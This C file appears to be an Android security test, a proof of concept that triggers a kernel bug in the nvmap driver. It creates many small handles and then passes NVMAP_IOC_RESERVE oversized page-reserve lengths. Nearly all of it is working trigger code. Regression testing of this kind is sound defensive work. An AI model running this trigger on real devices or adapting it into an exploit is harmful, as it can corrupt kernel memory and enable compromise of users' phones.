1 /*
2 * Copyright (C) 2017 The Android Open Source Project
3 *
4 * Licensed under the Apache License, Version 2.0 (the "License");
5 * you may not use this file except in compliance with the License.
6 * You may obtain a copy of the License at
7 *
8 * http://www.apache.org/licenses/LICENSE-2.0
9 *
10 * Unless required by applicable law or agreed to in writing, software
11 * distributed under the License is distributed on an "AS IS" BASIS,
12 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 * See the License for the specific language governing permissions and
14 * limitations under the License.
15 */
16 #define _GNU_SOURCE
17 #include <stdlib.h>
18 #include <errno.h>
19 #include <unistd.h>
20 #include <stdio.h>
21 #include <dirent.h>
22 #include <string.h>
23 #include <sys/stat.h>
24 #include <sys/ioctl.h>
25 #include <stdio.h>
26 #include <string.h>
27 #include <dlfcn.h>
28 #include <sys/time.h>
29 #include <sys/mman.h>
30 #include <sys/syscall.h>
31 #include <sys/resource.h>
32 #include <fcntl.h>
33 #include <pthread.h>
34 #include <unistd.h>
35 #include <sched.h>
36
37
/*
 * Argument block carried by NVMAP_IOC_PARAM (see the _IOWR definition in
 * this file): identifies a handle and an attribute, and has room for the
 * value that comes back. No function in this file issues that ioctl.
 */
struct nvmap_handle_param {
    __u32 handle;          /* nvmap handle being queried */
    __u32 param;           /* attribute selector: size/align/base/heap etc. */
    unsigned long result;  /* receives the requested information */
};
43
/*
 * Argument block shared by NVMAP_IOC_CREATE, NVMAP_IOC_GET_ID and
 * NVMAP_IOC_GET_FD. The anonymous union is the caller's input (which
 * member applies depends on the request); `handle` is the output slot.
 */
struct nvmap_create_handle {
    union {
        __u32 id;    /* FromId */
        __u32 size;  /* CreateHandle: requested size */
        __s32 fd;    /* DmaBufFd or FromFd */
    };
    __u32 handle;    /* written back: the nvmap handle */
};
52
/*
 * Argument block for NVMAP_IOC_ALLOC: asks the driver to back an existing
 * handle with memory from the selected heap(s).
 */
struct nvmap_alloc_handle {
    __u32 handle;     /* nvmap handle to back with memory */
    __u32 heap_mask;  /* NVMAP_HEAP_* bits: heaps to allocate from */
    __u32 flags;      /* NVMAP_HANDLE_* bits: wb/wc/uc/iwb etc. */
    __u32 align;      /* minimum alignment required */
};
59
/*
 * Batch descriptor: three parallel user-space arrays of `nr` u32 entries
 * each (handle, offset into that handle, length of the region), plus the
 * operation to apply. The pointers travel as 64-bit integers. In this file
 * the structure is the argument of NVMAP_IOC_RESERVE.
 *
 * Every array element is caller-controlled, so the receiving side has to
 * validate each offset/size pair against the handle it refers to.
 */
struct nvmap_cache_op_list {
    __u64 handles;  /* pointer to u32 array of handles */
    __u64 offsets;  /* pointer to u32 array of offsets into each handle's
                     * memory */
    __u64 sizes;    /* pointer to u32 array holding the size of the memory
                     * region within each handle */
    __u32 nr;       /* number of handles (entries per array) */
    __s32 op;       /* wb/wb_inv/inv */
};
69
/*
 * ioctl request codes for /dev/nvmap, listed by command number. All of
 * them share the magic byte 'N'. NVMAP_IOC_FREE is a plain _IO request:
 * trigger_nvmap_free() passes the handle by value as the ioctl argument
 * instead of through a structure.
 */
#define NVMAP_IOC_MAGIC   'N'

#define NVMAP_IOC_CREATE  _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
#define NVMAP_IOC_ALLOC   _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
#define NVMAP_IOC_FREE    _IO(NVMAP_IOC_MAGIC, 4)
#define NVMAP_IOC_PARAM   _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
#define NVMAP_IOC_GET_ID  _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
#define NVMAP_IOC_GET_FD  _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
#define NVMAP_IOC_RESERVE _IOW(NVMAP_IOC_MAGIC, 18, struct nvmap_cache_op_list)
78
/*
 * Common carveout heaps: bit values for nvmap_alloc_handle.heap_mask.
 * Only NVMAP_HEAP_CARVEOUT_GENERIC is used by this file.
 */
#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
#define NVMAP_HEAP_CARVEOUT_TSEC    (1ul<<27)
#define NVMAP_HEAP_CARVEOUT_VPR     (1ul<<28)
#define NVMAP_HEAP_CARVEOUT_IRAM    (1ul<<29)

/*
 * NOTE(review): NVMAP_HEAP_IOVMM is not defined anywhere in this file, so
 * this macro cannot be expanded here. It is never referenced below, which
 * is why the file still builds.
 */
#define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)
86
/*
 * Allocation flags for nvmap_alloc_handle.flags.
 *
 * The first group shares bits 0-1; NVMAP_HANDLE_CACHE_FLAG has the same
 * value as NVMAP_HANDLE_CACHEABLE (0x3) and is presumably the mask for
 * that two-bit field.
 */
#define NVMAP_HANDLE_UNCACHEABLE     (0x0ul << 0)
#define NVMAP_HANDLE_WRITE_COMBINE   (0x1ul << 0)
#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
#define NVMAP_HANDLE_CACHEABLE       (0x3ul << 0)
#define NVMAP_HANDLE_CACHE_FLAG      (0x3ul << 0)

/* Single-bit flags. Only NVMAP_HANDLE_ZEROED_PAGES is used by this file. */
#define NVMAP_HANDLE_SECURE          (0x1ul << 2)
#define NVMAP_HANDLE_KIND_SPECIFIED  (0x1ul << 3)
#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
#define NVMAP_HANDLE_ZEROED_PAGES    (0x1ul << 5)
#define NVMAP_HANDLE_PHYS_CONTIG     (0x1ul << 6)
#define NVMAP_HANDLE_CACHE_SYNC      (0x1ul << 7)
/*
 * Operation codes. This file stores NVMAP_PAGES_RESERVE in
 * nvmap_cache_op_list.op before issuing NVMAP_IOC_RESERVE.
 */
enum {
    NVMAP_PAGES_UNRESERVE = 0,
    NVMAP_PAGES_RESERVE = 1
};
/* Number of handles the test creates, allocates and lists in g_op_list. */
#define MAX_HANDLE_NUM (1000)

/* Descriptor for /dev/nvmap; stays -1 until open_driver() succeeds. */
int g_fd = -1;

/* Not referenced by any function in this file. */
static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;

/* Argument block reused for every NVMAP_IOC_CREATE; set in prepare_data(). */
struct nvmap_create_handle* g_allocation = NULL;

/* Argument block reused for every NVMAP_IOC_ALLOC; only .handle changes. */
struct nvmap_alloc_handle g_real_alloc = {0};

/* Argument block for NVMAP_IOC_RESERVE; filled once by prepare_data(). */
struct nvmap_cache_op_list g_op_list = {0};

/*
 * NOTE(review): "= {-1}" sets only element 0 to -1; the remaining elements
 * are zero-initialised. g_handles_for_alloc is overwritten in full by
 * create_handles() before it is read, and g_handles_for_free is never
 * referenced in this file.
 */
int g_handles_for_free[MAX_HANDLE_NUM] = {-1};
int g_handles_for_alloc[MAX_HANDLE_NUM] = {-1};
113
/*
 * Open the nvmap device node read/write and store the descriptor in g_fd.
 *
 * Returns the descriptor on success, or the negative value from open() on
 * failure. Either outcome is logged; errno is included only in the failure
 * message.
 */
int open_driver() {
    char* node = "/dev/nvmap";

    g_fd = open(node, O_RDWR);
    if (g_fd >= 0) {
        printf("[*] open file(%s) succ!\n", node);
        return g_fd;
    }

    printf("[*] open file(%s) failed, errno=%d\n", node, errno);
    return g_fd;
}
124
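/*
 * Ask the driver for a new handle using the shared g_allocation block
 * (its size field is set by prepare_data()).
 *
 * Returns the handle the driver wrote back. The output slot is preset to
 * -1, so -1 is returned when the ioctl leaves it untouched. Also returns
 * -1 if prepare_data() has not set g_allocation yet.
 *
 * The log line reports errno only when ioctl() actually failed. errno is
 * not reset by successful calls, so printing it unconditionally would
 * show a stale value from an earlier failure.
 */
int trigger_nvmap_create() {
    int err = 0;

    if (g_allocation == NULL) {
        return -1;
    }

    /* Sentinel: stored as 0xFFFFFFFF in the __u32 field, read back as -1. */
    g_allocation->handle = -1;
    if (ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation) < 0) {
        err = errno;
    }
    printf("[*] NVMAP_IOC_CREATE, last error = %d\n", err);
    return g_allocation->handle;
}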
131
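/*
 * Back `handle` with memory via NVMAP_IOC_ALLOC. Heap mask, flags and
 * alignment come from g_real_alloc as set up by prepare_data(); only the
 * handle field is updated per call.
 *
 * The log line reports errno only when ioctl() failed, and 0 otherwise,
 * because a successful call does not clear errno.
 */
void trigger_nvmap_alloc(int handle) {
    int err = 0;

    g_real_alloc.handle = handle;
    if (ioctl(g_fd, NVMAP_IOC_ALLOC, &g_real_alloc) < 0) {
        err = errno;
    }
    printf("[*] NVMAP_IOC_ALLOC, last error = %d\n", err);
}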
137
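/*
 * Release `handle` with NVMAP_IOC_FREE. The handle is passed by value as
 * the ioctl argument. Not called from main() in this file.
 *
 * The log line reports errno only when ioctl() failed, and 0 otherwise,
 * because a successful call does not clear errno.
 */
void trigger_nvmap_free(int handle) {
    int err = 0;

    /*
     * NOTE(review): `handle` is an int going through ioctl()'s variadic
     * parameter. Whether the upper bits are defined on a 64-bit ABI
     * depends on the platform's calling convention; confirm before
     * relying on this helper.
     */
    if (ioctl(g_fd, NVMAP_IOC_FREE, handle) < 0) {
        err = errno;
    }
    printf("[*] NVMAP_IOC_FREE last error = %d\n", err);
}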
142
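/*
 * Set the calling thread's scheduling priority to `privi` and restrict it
 * to the CPUs whose bits are set in `cpu_mask`. Not called from main() in
 * this file.
 *
 * Both steps are best-effort: failures are logged and execution continues.
 * The setpriority() line reports errno only when the call failed, and 0
 * otherwise, because a successful call does not clear errno.
 */
void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
    int err = 0;

    if (setpriority(PRIO_PROCESS, gettid(), privi) < 0) {
        err = errno;
    }
    printf("[*] setpriority(%d) errno = %d\n", privi, err);

    /*
     * Bind the thread to the CPUs in cpu_mask. The mask is handed over as
     * a raw bit array of sizeof(cpu_mask) bytes; the cast only satisfies
     * the cpu_set_t prototype.
     */
    if (sched_setaffinity(gettid(), sizeof(cpu_mask),
                          (const cpu_set_t*)&cpu_mask) < 0) {
        /* cpu_mask is unsigned long, so %lu is the matching conversion. */
        printf("[*] sched_setaffinity(%lu) errno = %d\n", cpu_mask, errno);
    }
}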
152
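/*
 * Build the three argument blocks the test reuses:
 *
 *  - g_allocation: a zeroed 0x1000-byte buffer used as the
 *    NVMAP_IOC_CREATE argument, requesting 0x40-byte handles;
 *  - g_real_alloc: generic carveout heap, zeroed pages, 0x40 alignment;
 *  - g_op_list: a MAX_HANDLE_NUM-entry list over g_handles_for_alloc with
 *    every offset 0 and every size 0xFFFF0000, op = NVMAP_PAGES_RESERVE.
 *
 * Each listed size is far larger than the 0x40 bytes requested per handle.
 * That mismatch is the input this test feeds to NVMAP_IOC_RESERVE; a
 * driver that checks offset + size against the handle's size is presumably
 * expected to reject it (confirm against the driver fix).
 *
 * The buffers are intentionally never freed; they live until process exit.
 * Allocation failure terminates the process with EXIT_FAILURE instead of
 * dereferencing NULL.
 */
void prepare_data() {
    int i;
    void* data = calloc(1, 0x1000);
    __u32* offsets = calloc(MAX_HANDLE_NUM, sizeof(*offsets));
    __u32* sizes = malloc(MAX_HANDLE_NUM * sizeof(*sizes));

    if (data == NULL || offsets == NULL || sizes == NULL) {
        printf("[*] prepare_data: allocation failed\n");
        free(data);
        free(offsets);
        free(sizes);
        exit(EXIT_FAILURE);
    }

    g_allocation = (struct nvmap_create_handle*)data;
    g_allocation->size = 0x40;

    g_real_alloc.align = 0x40;
    g_real_alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
    g_real_alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;

    /*
     * Entries are u32 per the struct's field comments, so the size array
     * is written through __u32* rather than int*: 0xFFFF0000 does not fit
     * in a signed 32-bit int.
     */
    for (i = 0; i < MAX_HANDLE_NUM; ++i) {
        sizes[i] = 0xFFFF0000;
    }

    /*
     * Pointers are widened through unsigned long first so the conversion
     * to __u64 is well-defined on 32-bit builds as well.
     */
    g_op_list.handles = (__u64)(unsigned long)&g_handles_for_alloc[0];
    g_op_list.offsets = (__u64)(unsigned long)offsets;
    g_op_list.sizes = (__u64)(unsigned long)sizes;
    g_op_list.nr = MAX_HANDLE_NUM;
    g_op_list.op = NVMAP_PAGES_RESERVE;
}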
173
174
/*
 * Fill every slot of g_handles_for_alloc with a freshly created handle.
 * A slot holds whatever trigger_nvmap_create() returned, including its
 * failure value; nothing is checked here.
 */
void create_handles() {
    int slot = 0;

    while (slot < MAX_HANDLE_NUM) {
        g_handles_for_alloc[slot] = trigger_nvmap_create();
        ++slot;
    }
}
183
184
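/*
 * Issue NVMAP_IOC_RESERVE with the prepared g_op_list.
 *
 * `handle` is accepted for signature compatibility but is not used: each
 * call submits the whole MAX_HANDLE_NUM-entry list, not a single handle.
 *
 * The log line reports errno only when ioctl() failed, and 0 otherwise,
 * because a successful call does not clear errno.
 */
void trigger_rw_handle(int handle) {
    int err = 0;

    (void)handle; /* unused; see comment above */

    if (ioctl(g_fd, NVMAP_IOC_RESERVE, &g_op_list) < 0) {
        err = errno;
    }
    printf("[*] NVMAP_IOC_RESERVE errno = %d\n", err);
}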
189
/*
 * Test driver. Sequence:
 *   1. open /dev/nvmap (exit with -1 if that fails);
 *   2. build the shared ioctl argument blocks;
 *   3. create MAX_HANDLE_NUM handles and allocate memory for each;
 *   4. after a one-second pause, issue NVMAP_IOC_RESERVE MAX_HANDLE_NUM
 *      times. Every call submits the same full list, because
 *      trigger_rw_handle() ignores its argument.
 *
 * No ioctl result is checked here; each helper only logs. The descriptor
 * and the heap buffers are left for process exit to release.
 */
int main(int argc, char**argv) {
    int n;

    if (open_driver() < 0) {
        return -1;
    }

    prepare_data();
    create_handles();

    n = 0;
    while (n < MAX_HANDLE_NUM) {
        trigger_nvmap_alloc(g_handles_for_alloc[n]);
        ++n;
    }

    printf("[*] Begin to trigger bug....\n");
    sleep(1);

    n = 0;
    while (n < MAX_HANDLE_NUM) {
        trigger_rw_handle(g_handles_for_alloc[n]);
        ++n;
    }

    return 0;
}
214